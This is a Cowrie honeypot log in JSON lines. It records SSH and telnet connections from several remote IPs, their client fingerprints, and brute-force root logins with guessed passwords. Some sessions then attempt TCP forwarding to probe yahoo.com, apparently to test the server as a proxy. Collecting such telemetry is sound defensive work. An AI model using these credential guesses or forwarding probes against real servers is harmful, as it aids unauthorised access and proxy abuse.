{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:24.240878Z","src_ip":"134.199.225.42","session":"d04085d55d75"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":47326,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9c00d77b01b","protocol":"ssh","message":"New connection: 134.199.225.42:47326 (1.2.3.4:22) [session: a9c00d77b01b]","sensor":"my-vps","timestamp":"2025-08-26T06:09:24.397723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:09:24.398534Z","src_ip":"134.199.225.42","session":"a9c00d77b01b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:09:24.556921Z","src_ip":"134.199.225.42","session":"a9c00d77b01b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:09:25.231870Z","src_ip":"134.199.225.42","session":"a9c00d77b01b"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:25.390914Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:25.392281Z","src_ip":"134.199.225.42","session":"a9c00d77b01b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55766,"dst_ip":"1.2.3.4","dst_port":22,"session":"37b6d646d7f9","protocol":"ssh","message":"New connection: 212.227.235.229:55766 (1.2.3.4:22) [session: 37b6d646d7f9]","sensor":"my-vps","timestamp":"2025-08-26T06:09:26.222615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:26.575231Z","src_ip":"212.227.235.229","session":"37b6d646d7f9"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:26.575882Z","src_ip":"212.227.235.229","session":"37b6d646d7f9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:27.720156Z","src_ip":"212.227.235.229","session":"37b6d646d7f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55772,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6500f9646f3","protocol":"ssh","message":"New connection: 212.227.235.229:55772 (1.2.3.4:22) [session: e6500f9646f3]","sensor":"my-vps","timestamp":"2025-08-26T06:09:27.963490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:28.250406Z","src_ip":"212.227.235.229","session":"e6500f9646f3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:28.251039Z","src_ip":"212.227.235.229","session":"e6500f9646f3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:29.277202Z","src_ip":"212.227.235.229","session":"e6500f9646f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55802,"dst_ip":"1.2.3.4","dst_port":22,"session":"52db9a7b45da","protocol":"ssh","message":"New connection: 212.227.235.229:55802 (1.2.3.4:22) [session: 52db9a7b45da]","sensor":"my-vps","timestamp":"2025-08-26T06:09:29.503070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:29.770812Z","src_ip":"212.227.235.229","session":"52db9a7b45da"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:29.771492Z","src_ip":"212.227.235.229","session":"52db9a7b45da"}
{"eventid":"cowrie.session.connect","src_ip":"59.173.166.212","src_port":48918,"dst_ip":"1.2.3.4","dst_port":23,"session":"992b81171d31","protocol":"telnet","message":"New connection: 59.173.166.212:48918 (1.2.3.4:23) [session: 992b81171d31]","sensor":"my-vps","timestamp":"2025-08-26T06:09:30.500016Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:30.776814Z","src_ip":"212.227.235.229","session":"52db9a7b45da"}
{"eventid":"cowrie.session.closed","duration":30.850104093551636,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:10:01.350054Z","src_ip":"59.173.166.212","session":"992b81171d31"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":40608,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e1b913535f3","protocol":"ssh","message":"New connection: 134.199.225.42:40608 (1.2.3.4:22) [session: 2e1b913535f3]","sensor":"my-vps","timestamp":"2025-08-26T06:10:21.148993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:10:21.151111Z","src_ip":"134.199.225.42","session":"2e1b913535f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:10:21.311403Z","src_ip":"134.199.225.42","session":"2e1b913535f3"}
{"eventid":"cowrie.login.failed","username":"ladmin","password":"ladmin","message":"login attempt [ladmin/ladmin] failed","sensor":"my-vps","timestamp":"2025-08-26T06:10:21.991978Z","src_ip":"134.199.225.42","session":"2e1b913535f3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:10:23.154011Z","src_ip":"134.199.225.42","session":"2e1b913535f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32351,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8514269eec9","protocol":"ssh","message":"New connection: 212.227.125.160:32351 (1.2.3.4:22) [session: e8514269eec9]","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.209225Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.210371Z","src_ip":"212.227.125.160","session":"e8514269eec9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32620,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddefd54c7957","protocol":"ssh","message":"New connection: 212.227.125.160:32620 (1.2.3.4:22) [session: ddefd54c7957]","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.325152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.327507Z","src_ip":"212.227.125.160","session":"ddefd54c7957"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.443540Z","src_ip":"212.227.125.160","session":"ddefd54c7957"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.792942Z","src_ip":"212.227.125.160","session":"ddefd54c7957"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T06:10:24.909291Z","session":"ddefd54c7957"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":59069,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cdb2db8cba9","protocol":"ssh","message":"New connection: 213.209.150.239:59069 (1.2.3.4:22) [session: 6cdb2db8cba9]","sensor":"my-vps","timestamp":"2025-08-26T06:10:47.658154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:10:47.659163Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T06:10:47.715702Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:10:47.997637Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":11205,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11205","sensor":"my-vps","timestamp":"2025-08-26T06:10:48.055248Z","session":"6cdb2db8cba9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:10:48.111908Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":32346,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:32346","sensor":"my-vps","timestamp":"2025-08-26T06:10:48.266971Z","session":"6cdb2db8cba9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:10:48.323718Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:10:48.381724Z","src_ip":"213.209.150.239","session":"6cdb2db8cba9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":57504,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8ce25b932b8","protocol":"ssh","message":"New connection: 134.199.225.42:57504 (1.2.3.4:22) [session: f8ce25b932b8]","sensor":"my-vps","timestamp":"2025-08-26T06:11:20.839605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:11:20.842567Z","src_ip":"134.199.225.42","session":"f8ce25b932b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:11:21.000637Z","src_ip":"134.199.225.42","session":"f8ce25b932b8"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456789","message":"login attempt [postgres/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T06:11:21.676827Z","src_ip":"134.199.225.42","session":"f8ce25b932b8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:11:22.837851Z","src_ip":"134.199.225.42","session":"f8ce25b932b8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:11:34.325341Z","src_ip":"212.227.125.160","session":"ddefd54c7957"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61824,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c3d23003888","protocol":"ssh","message":"New connection: 212.227.125.160:61824 (1.2.3.4:22) [session: 3c3d23003888]","sensor":"my-vps","timestamp":"2025-08-26T06:11:46.400572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:11:46.637894Z","src_ip":"212.227.125.160","session":"3c3d23003888"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:11:46.638653Z","src_ip":"212.227.125.160","session":"3c3d23003888"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:11:47.534404Z","src_ip":"212.227.125.160","session":"3c3d23003888"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61838,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae616bcabfbd","protocol":"ssh","message":"New connection: 212.227.125.160:61838 (1.2.3.4:22) [session: ae616bcabfbd]","sensor":"my-vps","timestamp":"2025-08-26T06:11:47.739369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:11:47.815554Z","src_ip":"212.227.125.160","session":"ae616bcabfbd"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:11:47.989775Z","src_ip":"212.227.125.160","session":"ae616bcabfbd"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:11:48.243780Z","src_ip":"212.227.125.160","session":"ae616bcabfbd"}
